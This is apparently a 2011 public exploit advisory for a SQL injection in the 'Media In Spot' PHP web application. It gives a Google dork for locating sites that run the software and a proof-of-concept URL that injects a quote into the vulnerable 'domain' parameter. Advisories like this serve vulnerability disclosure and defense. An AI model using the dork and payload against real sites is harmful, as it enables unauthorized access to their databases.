# Exploit Title: Media In Spot SQL Injection # Google Dork: intext:""Powered By Media In Spot" # Date: 16/05/2011 # Author: Iolo Morganwg # Category: Web App # Version: PHP # Tested on: Windows XP # Vendor: http://www.mediainspot.com/ # Note: domain parameter is vulnerable to sql injection # Vulnerability http://site/view/lang/index.php?page=area.php&domain=3%27